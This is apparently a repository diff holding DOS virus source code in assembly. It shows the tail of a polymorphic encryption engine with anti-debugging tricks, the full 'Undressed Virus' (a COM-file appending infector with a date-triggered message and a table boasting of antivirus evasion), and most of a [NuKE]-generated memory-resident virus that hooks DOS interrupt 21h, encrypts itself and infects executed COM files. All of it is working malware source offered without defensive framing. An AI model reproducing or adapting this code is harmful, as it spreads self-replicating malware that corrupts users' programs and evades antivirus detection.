and byte ptr [si+Flip_It+1],0e4
|
||||
or byte ptr [si+Flip_It+1],al
|
||||
or byte ptr [si+Flip_It+1],ah
|
||||
Set_Rotate_It:
|
||||
and byte ptr [si+do_rotate+1],0fc
|
||||
or byte ptr [si+do_rotate+1],al
|
||||
and byte ptr [si+do_rot2+1],0fc
|
||||
or byte ptr [si+do_rot2+1],al
|
||||
Set_IncDec:
|
||||
and byte ptr [si+inc_bx_com],0fc
|
||||
or byte ptr [si+inc_bx_com],al
|
||||
and byte ptr [si+dec_bx_com],0fc
|
||||
or byte ptr [si+dec_bx_com],al
|
||||
|
||||
and byte ptr [si+Dummy5],0fc
|
||||
or byte ptr [si+Dummy5],al
|
||||
and byte ptr [si+Dummy6],0fc
|
||||
or byte ptr [si+Dummy6],al
|
||||
|
||||
Set_AddSub:
|
||||
and byte ptr [si+Dummy3+1],0fc
|
||||
and byte ptr [si+Dummy4+1],0fc
|
||||
or byte ptr [si+Dummy3+1],al
|
||||
or byte ptr [si+Dummy4+1],al
|
||||
|
||||
and byte ptr [si+Dummy7+1],0fc
|
||||
and byte ptr [si+Dummy8+1],0fc
|
||||
or byte ptr [si+Dummy7+1],al
|
||||
or byte ptr [si+Dummy8+1],al
|
||||
pop si ds
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Create_EncDec:
|
||||
push es di cx
|
||||
push cs
|
||||
pop es
|
||||
lea di,[bp+Encrypt_Sequence]
|
||||
call Get_Rand
|
||||
and ax,1fh
|
||||
shr ax,1 ;Insure odd number of encryptors to prevent
|
||||
shl ax,1 ;things like "INC AX / DEC AX" to leave prog
|
||||
inc ax ;unencrypted.
|
||||
|
||||
mov byte ptr cs:[bp+Encrypt_Length],al
|
||||
xchg cx,ax
|
||||
Make_Pattern:
|
||||
call Get_Rand
|
||||
and ax,7
|
||||
stosb
|
||||
loop Make_Pattern
|
||||
pop cx di es
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Copy_Decrypt_Code:
|
||||
push si di bx cx ds
|
||||
push bx di ;save for loop
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
lea si,[bp+Set_Pointy]
|
||||
movsw
|
||||
movsb
|
||||
lodsb ;Copy initial encryptor
|
||||
movsw
|
||||
movsb
|
||||
lodsb
|
||||
movsw
|
||||
|
||||
mov cl,byte ptr cs:[bp+Encrypt_Length]
|
||||
xor ch,ch
|
||||
lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
|
||||
Dec_Set_Loop:
|
||||
push cx
|
||||
lodsb
|
||||
push si ;Create the Decryptor from Sequence
|
||||
|
||||
mov bl,al
|
||||
xor bh,bh
|
||||
shl bx,1
|
||||
add bx,bp
|
||||
add bx,offset Command_Table
|
||||
mov ax,cs:[bx]
|
||||
|
||||
mov cl,ah
|
||||
xor ah,ah
|
||||
|
||||
lea si,[Xor_It+bp]
|
||||
add si,ax
|
||||
repnz movsb
|
||||
|
||||
pop si
|
||||
pop cx
|
||||
loop Dec_Set_Loop
|
||||
|
||||
|
||||
lea si,[Switcher+bp]
|
||||
movsw
|
||||
lodsb ;Finish off Decryptor
|
||||
movsw
|
||||
lodsb
|
||||
|
||||
movsw ;Loop Setup
|
||||
movsw
|
||||
|
||||
pop si bx
|
||||
mov ax,di ;Set Loop
|
||||
sub ax,si ;Do size of loop and offset from loop
|
||||
|
||||
mov cs:[Decryptor_Length+bp],ax
|
||||
|
||||
push ax ;Changed for Jump
|
||||
not ax
|
||||
add ax,5
|
||||
stosw
|
||||
pop ax
|
||||
|
||||
add bx,ax ;Set initial Pointer
|
||||
mov es:[si+1],bx
|
||||
|
||||
mov ax,di
|
||||
pop ds cx bx di si
|
||||
push si di bx cx
|
||||
Copy_Prog:
|
||||
push ax
|
||||
sub ax,di
|
||||
add ax,bx
|
||||
mov word ptr es:[di+1],ax
|
||||
pop ax
|
||||
mov di,ax
|
||||
repnz movsb
|
||||
pop cx bx di si
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Encrypt_It:
|
||||
push bx cx di si
|
||||
|
||||
call set_seqp
|
||||
|
||||
mov ax,cs:[Decryptor_Length+bp]
|
||||
inc ax
|
||||
inc ax
|
||||
add di,ax ;DI=start of code to be encrypted
|
||||
;CX=Length of code to encrypt
|
||||
mov si,di
|
||||
push es
|
||||
pop ds
|
||||
Big_Enc_Loop:
|
||||
push cx
|
||||
call Switcher
|
||||
mov cx,cs:[Encrypt_Length+bp]
|
||||
|
||||
Encrypt_Value:
|
||||
push ax bx cx dx si di
|
||||
mov si,cs:[Save_SI+bp]
|
||||
dec si
|
||||
mov bl,cs:[si] ;??
|
||||
mov cs:[Save_SI+bp],si
|
||||
lea si,cs:[Com_Table_2+bp]
|
||||
xor bh,bh
|
||||
shl bx,1
|
||||
add si,bx
|
||||
mov bx,cs:[si]
|
||||
add bx,bp
|
||||
mov word ptr cs:[Next_Command+bp],bx
|
||||
pop di si dx cx bx ax
|
||||
call cs:[Next_Command+bp]
|
||||
Loop Encrypt_Value
|
||||
|
||||
pop cx
|
||||
call Switcher
|
||||
call Inc_Pointy
|
||||
call set_seqp
|
||||
loop Big_Enc_Loop
|
||||
pop si di cx bx
|
||||
ret
|
||||
|
||||
Save_SI dw 0
|
||||
Next_Command dw 0
|
||||
set_seqp:
|
||||
push si
|
||||
lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
|
||||
add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
|
||||
mov cs:[Save_SI+bp],SI
|
||||
pop si
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Command_Table: ;8 commands -> 3 bits.
|
||||
db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
|
||||
db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
|
||||
db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
|
||||
db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
|
||||
db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
|
||||
db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
|
||||
db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
|
||||
db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
|
||||
Com_Table_2:
|
||||
dw [offset Xor_It]
|
||||
dw [offset Flip_It]
|
||||
dw [offset Rotate_It_2]
|
||||
dw [offset Rotate_It_1]
|
||||
dw [offset Dummy5]
|
||||
dw [offset Dummy6]
|
||||
dw [offset Dummy7]
|
||||
dw [offset Dummy8]
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Set_Pointy:
|
||||
mov di,1234 ;Pointer to Code
|
||||
ret
|
||||
Set_Size:
|
||||
mov cx,1234 ;Size
|
||||
ret
|
||||
Switcher:
|
||||
xchg bx,[di]
|
||||
ret
|
||||
Inc_Pointy:
|
||||
inc di
|
||||
inc di
|
||||
ret
|
||||
|
||||
Loop_Mut:
|
||||
dec cx
|
||||
jz End_Loop_Mut
|
||||
loop_set:
|
||||
jmp _ULTMUTE
|
||||
End_Loop_Mut:
|
||||
ret
|
||||
Xor_It:
|
||||
xor bx,1234
|
||||
ret
|
||||
Flip_It:
|
||||
xchg bh,bl
|
||||
ret
|
||||
|
||||
Rotate_It_1:
|
||||
jmp before_rot
|
||||
do_rotate:
|
||||
ror bx,1
|
||||
jmp after_rot
|
||||
before_rot:
|
||||
push ax
|
||||
call Ports1
|
||||
pop ax
|
||||
jmp do_rotate
|
||||
Ports1:
|
||||
in al,21
|
||||
or al,02
|
||||
out 21,al
|
||||
ret
|
||||
|
||||
Ports2:
|
||||
in al,21
|
||||
xor al,02
|
||||
out 21,al
|
||||
ret
|
||||
after_rot:
|
||||
push ax
|
||||
call ports2
|
||||
pop ax
|
||||
ret
|
||||
|
||||
Rotate_It_2:
|
||||
cli
|
||||
jmp confuzzled1
|
||||
do_rot2:
|
||||
rol bx,1
|
||||
call Switch_Int_1_3
|
||||
jmp donerot2
|
||||
|
||||
confuzzled1:
|
||||
call Switch_Int_1_3
|
||||
jmp do_rot2
|
||||
|
||||
Switch_Int_1_3:
|
||||
push ax ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
jmp short exch1
|
||||
db 0eah
|
||||
exch1:
|
||||
xchg ax,word ptr ds:[4]
|
||||
jmp short exch2
|
||||
db 9ah
|
||||
exch2:
|
||||
xchg ax,word ptr ds:[0c]
|
||||
xchg ax,word ptr ds:[4]
|
||||
pop ds ax
|
||||
ret
|
||||
donerot2:
|
||||
ret
|
||||
|
||||
Dummy1:
|
||||
jmp short inc_bx_com ;Kill Disassemblers
|
||||
db 0ea
|
||||
Rand_Byte1:
|
||||
db 0ea
|
||||
inc_bx_com:
|
||||
inc bx
|
||||
ret
|
||||
Dummy2:
|
||||
jmp short Kill_1
|
||||
Rand_Byte2:
|
||||
db 0ea
|
||||
Cont_Kill1:
|
||||
cli
|
||||
xchg ax,ds:[84]
|
||||
xchg ax,ds:[84]
|
||||
sti
|
||||
pop ds ax
|
||||
dec_bx_com:
|
||||
dec bx
|
||||
jmp short quit_Kill1
|
||||
Kill_1:
|
||||
push ax ds
|
||||
xor ax,ax
|
||||
mov ds,ax ;Anti-Debugger (Kills Int 21)
|
||||
jmp short Cont_Kill1
|
||||
Rand_Byte3:
|
||||
db 0e8
|
||||
quit_Kill1:
|
||||
ret
|
||||
Dummy3:
|
||||
add bx,1234
|
||||
push bx
|
||||
call throw_debugger
|
||||
Rand_Byte4:
|
||||
db 0e8 ;Prefetch Trick
|
||||
into_throw:
|
||||
sub bx,offset Rand_Byte4
|
||||
add byte ptr [bx+trick_em+1],0ba
|
||||
trick_em:
|
||||
jmp short done_trick
|
||||
Rand_Byte5:
|
||||
db 0ea
|
||||
throw_debugger:
|
||||
pop bx
|
||||
jmp short into_throw
|
||||
Rand_Byte6:
|
||||
db 0ea
|
||||
done_trick:
|
||||
sub byte ptr [bx+trick_em+1],0ba
|
||||
pop bx
|
||||
ret
|
||||
Dummy4:
|
||||
sub bx,1234
|
||||
jmp short Get_IRQ
|
||||
Rand_Byte7 db 0e8
|
||||
Kill_IRQ:
|
||||
out 21,al
|
||||
xor al,2
|
||||
jmp short Restore_IRQ
|
||||
Rand_Byte8 db 0e8
|
||||
Rand_Byte9 db 0e8 ;This will kill the keyboard
|
||||
Get_IRQ: ;IRQ
|
||||
push ax
|
||||
in al,21
|
||||
xor al,2
|
||||
jmp short Kill_IRQ
|
||||
Rand_Byte10 db 0e8
|
||||
Restore_IRQ:
|
||||
out 21,al
|
||||
pop ax
|
||||
ret
|
||||
|
||||
;The following are used for the encryption algorithm to reverse commands that
|
||||
;include anti-tracing.
|
||||
Dummy5:
|
||||
dec bx
|
||||
ret
|
||||
Dummy6:
|
||||
inc bx
|
||||
ret
|
||||
Dummy7:
|
||||
sub bx,1234
|
||||
ret
|
||||
Dummy8:
|
||||
add bx,1234
|
||||
ret
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Decryptor_Length dw 0
|
||||
Encrypt_Length dw 0
|
||||
Encrypt_Sequence db 30 dup(0)
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
_END_ULTMUTE:
|
||||
end _ULTMUTE
|
|
@ -0,0 +1,126 @@
|
|||
; Virus: The Undressed Virus
|
||||
; Author: Arsonic[Codebreakers]
|
||||
; Type: Appending
|
||||
; Encryption: No
|
||||
;
|
||||
; Displays a Message on Feb 5th.
|
||||
; Btw.. I Love Lisa..!
|
||||
;---------------------------------------------------------------------------------------------------
|
||||
; AV-Product | Detected? | Comments
|
||||
;---------------------------------------------------------------------------------------------------
|
||||
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
|
||||
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
|
||||
; AVP | VCL.824 | VCL! ARRGGGHH!
|
||||
;----------------------------------------------------------------------------------------------------
|
||||
db 0e9h,0,0
|
||||
start:
|
||||
call delta
|
||||
delta:
|
||||
pop bp
|
||||
sub bp,offset delta
|
||||
mov cx,0ffffh ;kill heristics
|
||||
fprot_loopy:
|
||||
jmp back
|
||||
mov ax,4c00h
|
||||
int 21h
|
||||
back:
|
||||
loop fprot_loopy
|
||||
mov cx,3
|
||||
nop
|
||||
mov di,100h
|
||||
nop
|
||||
lea si,[bp+buffer]
|
||||
nop
|
||||
rep movsb
|
||||
find_first:
|
||||
mov ah,4ch
|
||||
add ah,2
|
||||
nop
|
||||
find_next:
|
||||
nop
|
||||
lea dx,[bp+filemask]
|
||||
nop
|
||||
int 21h
|
||||
jnc infect
|
||||
jmp check_payload
|
||||
infect:
|
||||
mov ax,3d02h
|
||||
mov dx,9eh
|
||||
int 21h
|
||||
xchg ax,bx
|
||||
mov ah,3dh
|
||||
add ah,2
|
||||
mov cx,3
|
||||
lea dx,[bp+buffer]
|
||||
int 21h
|
||||
mov ax,word ptr[80h + 1ah]
|
||||
nop
|
||||
sub ax,end - start + 3
|
||||
nop
|
||||
cmp ax,word ptr[bp+buffer+1]
|
||||
nop
|
||||
je close_file
|
||||
mov ax,word ptr[80h + 1ah]
|
||||
nop
|
||||
sub ax,3
|
||||
nop
|
||||
mov word ptr[bp+three+1],ax
|
||||
mov ax,4200h
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21h
|
||||
mov ah,3eh
|
||||
add ah,2
|
||||
nop
|
||||
lea dx,[bp+three]
|
||||
nop
|
||||
mov cx,3
|
||||
nop
|
||||
int 21h
|
||||
mov ax,4202h
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21h
|
||||
mov ah,3eh
|
||||
add ah,2
|
||||
nop
|
||||
lea dx,[bp+start]
|
||||
nop
|
||||
mov cx,end - start
|
||||
nop
|
||||
int 21h
|
||||
close_file:
|
||||
mov ah,3ch
|
||||
add ah,2
|
||||
int 21h
|
||||
mov ah,4dh
|
||||
add ah,2
|
||||
jmp find_next
|
||||
check_payload:
|
||||
mov ah,2ah
|
||||
int 21h
|
||||
cmp dh,2 ;is it febuary?
|
||||
je next
|
||||
jmp close
|
||||
next:
|
||||
cmp dl,5 ;the 5th?
|
||||
je payload ;yes.. display the message
|
||||
jmp close ;no.. return control to the program.
|
||||
payload:
|
||||
mov ah,9h ;display message
|
||||
lea dx,[bp+message]
|
||||
int 21h
|
||||
int 00h ;get keypress
|
||||
int 16h
|
||||
int 20h ;return to dos.
|
||||
close:
|
||||
mov di,100h ;return control to program
|
||||
jmp di
|
||||
three db 0e9h,0,0
|
||||
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
|
||||
buffer db 0cdh,20h,0
|
||||
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
|
||||
author db 'Arsonic[CB]',0 ; nice scan string..
|
||||
message db 'Happy Birthday Lisa!',10,13,'$'
|
||||
Lisa db 'I LOVE U LISA!',0
|
||||
end:
|
|
@ -0,0 +1,473 @@
|
|||
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||||
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
|
||||
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
|
||||
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
|
||||
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
|
||||
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
|
||||
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||||
|
||||
.286
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
org 100h
|
||||
|
||||
start: CALL NEXT
|
||||
|
||||
NEXT:
|
||||
mov di,sp ;take the stack pointer location
|
||||
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
|
||||
sub bp,offset next ;subtract the large code off this code
|
||||
;
|
||||
;*******************************************************************
|
||||
; #1 DECRYPT ROUTINE
|
||||
;*******************************************************************
|
||||
|
||||
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
|
||||
je crypt2 ;yes! not decrypt
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt]+ bp ;di = first byte to decrypt
|
||||
mov dx,1 ;dx = value for decrypt
|
||||
;----------------------------------------------------------
|
||||
deci: ;deci = fuck label!
|
||||
;----------------------------------------------------------
|
||||
|
||||
ÿsub byte ptr [di],087h
|
||||
inc word ptr [di]
|
||||
xor byte ptr [di],022h
|
||||
inc word ptr [di]
|
||||
xor byte ptr [di],030h
|
||||
add byte ptr [di],075h
|
||||
xor byte ptr [di],061h
|
||||
sub byte ptr [di],0b9h
|
||||
xor word ptr [di],0e185h
|
||||
add word ptr [di],0aa17h
|
||||
not word ptr [di]
|
||||
inc byte ptr [di]
|
||||
inc word ptr [di]
|
||||
xor word ptr [di],0c3d7h
|
||||
sub word ptr [di],04a83h
|
||||
not byte ptr [di]
|
||||
xor word ptr [di],06acdh
|
||||
ÿinc di
|
||||
inc di
|
||||
;----------------------------------------------------------
|
||||
jmp bye ;######## BYE BYE F-PROT ! ##########
|
||||
mov ah,4ch
|
||||
int 21h
|
||||
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
|
||||
;-----------------------------------------------------------
|
||||
mov ah,0bh ;######### BYE BYE TBAV ! ##########
|
||||
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
|
||||
;----------------------------------------------------------
|
||||
loop deci ;repeat please!
|
||||
;
|
||||
;*****************************************************************
|
||||
; #2 DECRYPT ROUTINE
|
||||
;*****************************************************************
|
||||
;
|
||||
crypt: ;fuck label!
|
||||
;
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt2] + bp ;di = first byte to decrypt
|
||||
;---------------------------------------------------------------
|
||||
deci2: ;
|
||||
xor byte ptr cs:[di],1 ;decrytion rutine
|
||||
inc di ;very simple...
|
||||
loop deci2 ;
|
||||
;---------------------------------------------------------------
|
||||
crypt2: ;fuck label!
|
||||
;
|
||||
MOV AX,0CACAH ;call to my resident interrup mask
|
||||
INT 21H ;for chek "I'm is residet?"
|
||||
CMP Bh,0CAH ;is equal to CACA?
|
||||
JE PUM2 ;yes! jump to runnig program
|
||||
call action
|
||||
;*****************************************************************
|
||||
; NRLG FUNCTIONS (SELECTABLE)
|
||||
;*****************************************************************
|
||||
|
||||
ÿcall ANTI_V
|
||||
;****************************************************************
|
||||
; PROCESS TO REMAIN RESIDENT
|
||||
;****************************************************************
|
||||
|
||||
mov ax,3521h
|
||||
int 21h ;store the int 21 vectors
|
||||
mov word ptr [bp+int21],bx ;in cs:int21
|
||||
mov word ptr [bp+int21+2],es ;
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ax ;ax = my actual segment
|
||||
dec ax ;dec my segment for look my MCB
|
||||
mov es,ax ;
|
||||
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop es ;
|
||||
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
|
||||
sub bx,17 + offset fin ;and 100H for the PSP total
|
||||
mov ah,4ah ;used memory
|
||||
int 21h ;put the new value to MCB
|
||||
;---------------------------------------------------------------
|
||||
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
|
||||
mov ah,48h ;
|
||||
int 21h ;request the memory to fuck DOS!
|
||||
;---------------------------------------------------------------
|
||||
dec ax ;ax=new segment
|
||||
mov es,ax ;ax-1= new segment MCB
|
||||
mov byte ptr es:[1],8 ;put '8' in the segment
|
||||
;--------------------------------------------------------------
|
||||
inc ax ;
|
||||
mov es,ax ;es = new segment
|
||||
lea si,[bp + offset start] ;si = start of virus
|
||||
mov di,100h ;di = 100H (psp position)
|
||||
mov cx,offset fin - start ;cx = lag of virus
|
||||
push cs ;
|
||||
pop ds ;ds = cs
|
||||
cld ;mov the code
|
||||
rep movsb ;ds:si >> es:di
|
||||
;--------------------------------------------------------------
|
||||
mov dx,offset virus ;dx = new int21 handler
|
||||
mov ax,2521h ;
|
||||
push es ;
|
||||
pop ds ;
|
||||
int 21h ;set the vectors
|
||||
;-------------------------------------------------------------
|
||||
pum2: ;
|
||||
;
|
||||
mov ah,byte ptr [cs:bp + real] ;restore the 3
|
||||
mov byte ptr cs:[100h],ah ;first bytes
|
||||
mov ax,word ptr [cs:bp + real + 1] ;
|
||||
mov word ptr cs:[101h],ax ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,100h ;
|
||||
jmp ax ;jmp to execute
|
||||
;
|
||||
;*****************************************************************
|
||||
;* HANDLER FOR THE INT 21H
|
||||
;*****************************************************************
|
||||
;
|
||||
VIRUS: ;
|
||||
;
|
||||
cmp ah,4bh ;is a 4b function?
|
||||
je REPRODUCCION ;yes! jump to reproduce !
|
||||
cmp ah,11h
|
||||
je dir
|
||||
cmp ah,12h
|
||||
je dir
|
||||
dirsal:
|
||||
cmp AX,0CACAH ;is ... a caca function? (resident chek)
|
||||
jne a3 ;no! jump to a3
|
||||
mov bh,0cah ;yes! put ca in bh
|
||||
a3: ;
|
||||
JMP dword ptr CS:[INT21] ;jmp to original int 21h
|
||||
ret ;
|
||||
make db '[NuKE] N.R.L.G. AZRAEL'
|
||||
dir:
|
||||
jmp dir_s
|
||||
;-------------------------------------------------------------
|
||||
REPRODUCCION: ;
|
||||
;
|
||||
pushf ;put the register
|
||||
pusha ;in the stack
|
||||
push si ;
|
||||
push di ;
|
||||
push bp ;
|
||||
push es ;
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ax,3524H ;get the dos error control
|
||||
int 21h ;interupt
|
||||
mov word ptr error,es ;and put in cs:error
|
||||
mov word ptr error+2,bx ;
|
||||
mov ax,2524H ;change the dos error control
|
||||
mov dx,offset all ;for my "trap mask"
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the registers
|
||||
pop bp ;
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;-------------------------------------------------------------
|
||||
pushf ;put the registers
|
||||
pusha ;
|
||||
push si ;HEY! AZRAEL IS CRAZY?
|
||||
push di ;PUSH, POP, PUSH, POP
|
||||
push bp ;PLEEEEEAAAAAASEEEEEEEEE
|
||||
push es ;PURIFY THIS SHIT!
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4300h ;
|
||||
int 21h ;get the file
|
||||
mov word ptr cs:[attrib],cx ;atributes
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4301h ;le saco los atributos al
|
||||
xor cx,cx ;file
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,3d02h ;open the file
|
||||
int 21h ;for read/write
|
||||
mov bx,ax ;bx=handle
|
||||
;-------------------------------------------------------------
|
||||
mov ax,5700h ;
|
||||
int 21h ;get the file date
|
||||
mov word ptr cs:[hora],cx ;put the hour
|
||||
mov word ptr cs:[dia],dx ;put the day
|
||||
and cx,word ptr cs:[fecha] ;calculate the seconds
|
||||
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
|
||||
jne seguir ;yes! the file is infected!
|
||||
jmp cerrar ;
|
||||
;------------------------------------------------------------
|
||||
seguir: ;
|
||||
mov ax,4202h ;move the pointer to end
|
||||
call movedor ;of the file
|
||||
;------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
sub ax,3 ;calculate the
|
||||
mov word ptr [cs:largo],ax ;jmp long
|
||||
;-------------------------------------------------------------
|
||||
mov ax,04200h ;move the pointer to
|
||||
call movedor ;start of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;read the 3 first bytes
|
||||
mov ah,3fh ;
|
||||
mov cx,3 ;
|
||||
lea dx,[cs:real] ;put the bytes in cs:[real]
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
|
||||
jne er1 ;yes! is a EXE... fuckkk!
|
||||
;----------------------------------------------------------
|
||||
jmp cerrar
|
||||
er1:
|
||||
;----------------------------------------------------------
|
||||
mov ax,4200h ;move the pointer
|
||||
call movedor ;to start fo file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ah,40h ;
|
||||
mov cx,1 ;write the JMP
|
||||
lea dx,[cs:jump] ;instruccion in the
|
||||
int 21h ;fist byte of the file
|
||||
;----------------------------------------------------------
|
||||
mov ah,40h ;write the value of jmp
|
||||
mov cx,2 ;in the file
|
||||
lea dx,[cs:largo] ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,04202h ;move the pointer to
|
||||
call movedor ;end of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;move the code
|
||||
push cs ;of my virus
|
||||
pop es ;to cs:end+50
|
||||
cld ;for encrypt
|
||||
mov si,100h ;
|
||||
mov di,offset fin + 50 ;
|
||||
mov cx,offset fin - 100h ;
|
||||
rep movsb ;
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
|
||||
enc: ;
|
||||
xor byte ptr cs:[di],1 ;encrypt the virus
|
||||
inc di ;code
|
||||
loop enc ;
|
||||
;---------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
|
||||
mov dx,1
|
||||
enc2: ;
|
||||
|
||||
xor word ptr [di],06acdh
|
||||
not byte ptr [di]
|
||||
add word ptr [di],04a83h
|
||||
xor word ptr [di],0c3d7h
|
||||
dec word ptr [di]
|
||||
dec byte ptr [di]
|
||||
not word ptr [di]
|
||||
sub word ptr [di],0aa17h
|
||||
xor word ptr [di],0e185h
|
||||
add byte ptr [di],0b9h
|
||||
xor byte ptr [di],061h
|
||||
sub byte ptr [di],075h
|
||||
xor byte ptr [di],030h
|
||||
dec word ptr [di]
|
||||
xor byte ptr [di],022h
|
||||
dec word ptr [di]
|
||||
add byte ptr [di],087h
|
||||
ÿinc di
|
||||
inc di ;the virus code
|
||||
loop enc2 ;
|
||||
;--------------------------------------------
|
||||
mov ah,40h ;
|
||||
mov cx,offset fin - offset start ;copy the virus
|
||||
mov dx,offset fin + 50 ;to end of file
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cerrar: ;
|
||||
;restore the
|
||||
mov ax,5701h ;date and time
|
||||
mov cx,word ptr cs:[hora] ;file
|
||||
mov dx,word ptr cs:[dia] ;
|
||||
or cx,word ptr cs:[fecha] ;and mark the seconds
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ah,3eh ;
|
||||
int 21h ;close the file
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the
|
||||
pop bp ;registers
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
pusha ;
|
||||
;
|
||||
mov ax,4301h ;restores the atributes
|
||||
mov cx,word ptr cs:[attrib] ;of the file
|
||||
int 21h ;
|
||||
;
|
||||
popa ;
|
||||
;----------------------------------------------------------
|
||||
pushf ;
|
||||
pusha ; 8-( = f-prot
|
||||
push si ;
|
||||
